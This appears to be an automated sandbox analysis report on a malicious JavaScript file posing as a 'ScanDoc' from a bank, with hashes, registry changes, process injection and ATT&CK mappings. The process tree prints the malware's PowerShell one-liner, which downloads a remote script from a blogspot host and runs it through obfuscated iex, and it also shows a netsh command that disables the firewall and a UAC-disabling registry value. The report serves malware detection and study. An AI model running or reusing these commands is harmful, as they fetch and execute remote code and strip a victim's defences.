Analysis
-
max time kernel
184s -
max time network
194s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
17-01-2024 01:58
Static task
static1
Behavioral task
behavioral1
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10-20231215-en
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 5020 powershell.exe 4 5020 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000\Software\Microsoft\Windows\CurrentVersion\Run\Deissl1 = "schtasks /run /tn Deissl1" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 api.ipify.org 14 api.ipify.org 17 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 5020 set thread context of 4544 5020 powershell.exe RegSvcs.exe PID 5020 set thread context of 524 5020 powershell.exe RegSvcs.exe PID 5020 set thread context of 3600 5020 powershell.exe Msbuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exeRegSvcs.exedw20.exedw20.exepid process 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 4544 RegSvcs.exe 4544 RegSvcs.exe 3044 dw20.exe 3044 dw20.exe 1832 dw20.exe 1832 dw20.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 5020 powershell.exe Token: SeIncreaseQuotaPrivilege 5020 powershell.exe Token: SeSecurityPrivilege 5020 powershell.exe Token: SeTakeOwnershipPrivilege 5020 powershell.exe Token: SeLoadDriverPrivilege 5020 powershell.exe Token: SeSystemProfilePrivilege 5020 powershell.exe Token: SeSystemtimePrivilege 5020 powershell.exe Token: SeProfSingleProcessPrivilege 5020 powershell.exe Token: SeIncBasePriorityPrivilege 5020 powershell.exe Token: SeCreatePagefilePrivilege 5020 powershell.exe Token: SeBackupPrivilege 5020 powershell.exe Token: SeRestorePrivilege 5020 powershell.exe Token: SeShutdownPrivilege 5020 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeSystemEnvironmentPrivilege 5020 powershell.exe Token: SeRemoteShutdownPrivilege 5020 powershell.exe Token: SeUndockPrivilege 5020 powershell.exe Token: SeManageVolumePrivilege 5020 powershell.exe Token: 33 5020 powershell.exe Token: 34 5020 powershell.exe Token: 35 5020 powershell.exe Token: 36 5020 powershell.exe Token: SeIncreaseQuotaPrivilege 5020 powershell.exe Token: SeSecurityPrivilege 5020 powershell.exe Token: SeTakeOwnershipPrivilege 5020 powershell.exe Token: SeLoadDriverPrivilege 5020 powershell.exe Token: SeSystemProfilePrivilege 5020 powershell.exe Token: SeSystemtimePrivilege 5020 powershell.exe Token: SeProfSingleProcessPrivilege 5020 powershell.exe Token: SeIncBasePriorityPrivilege 5020 powershell.exe Token: SeCreatePagefilePrivilege 5020 powershell.exe Token: SeBackupPrivilege 5020 powershell.exe Token: SeRestorePrivilege 5020 powershell.exe Token: SeShutdownPrivilege 5020 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeSystemEnvironmentPrivilege 5020 powershell.exe Token: SeRemoteShutdownPrivilege 5020 powershell.exe Token: SeUndockPrivilege 5020 powershell.exe Token: SeManageVolumePrivilege 5020 powershell.exe Token: 33 5020 powershell.exe Token: 34 5020 powershell.exe Token: 35 5020 powershell.exe Token: 36 5020 powershell.exe Token: SeIncreaseQuotaPrivilege 5020 powershell.exe Token: SeSecurityPrivilege 5020 powershell.exe Token: SeTakeOwnershipPrivilege 5020 powershell.exe Token: SeLoadDriverPrivilege 5020 powershell.exe Token: SeSystemProfilePrivilege 5020 powershell.exe Token: SeSystemtimePrivilege 5020 powershell.exe Token: SeProfSingleProcessPrivilege 5020 powershell.exe Token: SeIncBasePriorityPrivilege 5020 powershell.exe Token: SeCreatePagefilePrivilege 5020 powershell.exe Token: SeBackupPrivilege 5020 powershell.exe Token: SeRestorePrivilege 5020 powershell.exe Token: SeShutdownPrivilege 5020 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeSystemEnvironmentPrivilege 5020 powershell.exe Token: SeRemoteShutdownPrivilege 5020 powershell.exe Token: SeUndockPrivilege 5020 powershell.exe Token: SeManageVolumePrivilege 5020 powershell.exe Token: 33 5020 powershell.exe Token: 34 5020 powershell.exe Token: 35 5020 powershell.exe Token: 36 5020 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeRegSvcs.exeMsbuild.exedescription pid process target process PID 1468 wrote to memory of 5020 1468 wscript.exe powershell.exe PID 1468 wrote to memory of 5020 1468 wscript.exe powershell.exe PID 5020 wrote to memory of 3164 5020 powershell.exe csc.exe PID 5020 wrote to memory of 3164 5020 powershell.exe csc.exe PID 3164 wrote to memory of 600 3164 csc.exe cvtres.exe PID 3164 wrote to memory of 600 3164 csc.exe cvtres.exe PID 5020 wrote to memory of 4980 5020 powershell.exe netsh.exe PID 5020 wrote to memory of 4980 5020 powershell.exe netsh.exe PID 5020 wrote to memory of 4544 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 4544 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 4544 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 4544 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 4544 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 4544 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 4544 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 4544 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 524 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 524 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 524 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 524 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 524 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 524 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 524 5020 powershell.exe RegSvcs.exe PID 5020 wrote to memory of 524 5020 powershell.exe RegSvcs.exe PID 524 wrote to memory of 3044 524 RegSvcs.exe dw20.exe PID 524 wrote to memory of 3044 524 RegSvcs.exe dw20.exe PID 524 wrote to memory of 3044 524 RegSvcs.exe dw20.exe PID 5020 wrote to memory of 3600 5020 powershell.exe Msbuild.exe PID 5020 wrote to memory of 3600 5020 powershell.exe Msbuild.exe PID 5020 wrote to memory of 3600 5020 powershell.exe Msbuild.exe PID 5020 wrote to memory of 3600 5020 powershell.exe Msbuild.exe PID 5020 wrote to memory of 3600 5020 powershell.exe Msbuild.exe PID 5020 wrote to memory of 3600 5020 powershell.exe Msbuild.exe PID 5020 wrote to memory of 3600 5020 powershell.exe Msbuild.exe PID 5020 wrote to memory of 3600 5020 powershell.exe Msbuild.exe PID 3600 wrote to memory of 1832 3600 Msbuild.exe dw20.exe PID 3600 wrote to memory of 1832 3600 Msbuild.exe dw20.exe PID 3600 wrote to memory of 1832 3600 Msbuild.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js1⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afko1hso\afko1hso.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB594.tmp" "c:\Users\Admin\AppData\Local\Temp\afko1hso\CSC8B2C5738380449018CCA3CA651F493C4.TMP"4⤵PID:600
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:4980 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4544 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7044⤵
- Suspicious behavior: EnumeratesProcesses
PID:3044 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7044⤵
- Suspicious behavior: EnumeratesProcesses
PID:1832
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d98885d5740fac1a3aa5ac2ea62cc950
SHA1c1b76024b1bc5a0b55ad5d38d82482997d92712d
SHA256e96c4725ee919132fd1ea9f4073696f0853d5697a2ed0653344de28c4ae9e691
SHA512dd9c17238eb9ea34234ac3467d78ce04f01e6f53ec698641562375da4f0fcc1bacb35f1d662127b79e90064b69d080814e1c0285550bb900cd4addf5fe39c95f
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD5a6411608155ba32adc204ca1e5ba94e2
SHA18615409b29771a319f92c2fdc172bfd51fdd2905
SHA2568caedc0b1e76ca1673e6c1154dea5c1c8fa7f3c89c7cfc5070addc123a08c5cf
SHA5124fe15374b490011f6406060de116e08c780ec861f99265690b7cb41dcbbd1efcc7613a2f17cc6a066a6d3c96cf07864cc52ac3af210c1f9640cdae5c6b7b3fc6
-
Filesize
652B
MD5399c721be0552d4d7396eba366dbc668
SHA149a8132735aa331cf9eacbcc31a8e52556f1ca5f
SHA256d44dd59782c5b4cf15a6e57bd06d0422b7847c341324e264d0bf57d8aca62b44
SHA5125debdf77d93c403d74bc90081f0032a44595f9d3275ebba9529cd8627a7731334d5cb5ca5d95010d23a49f22211c442e9fac3d1ac2ae91dff33b2ff61c7a6f97
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD5612780a8361711b3ade3666a35c73817
SHA1f0178b947f8388255bdc2ad28d34ad9a95cf2b66
SHA25614848d5dd8b99e6e834b9de9121fbacb5a5fe66bda20eff87bb4537017552e8b
SHA512618d4d4cead557f8499464356a098618d79ccfff79ab8647f694780a039fcb4f730b8d6e039b2b3e8a68b3a1a8768f27499bee8c27628daced23142233a4e3fe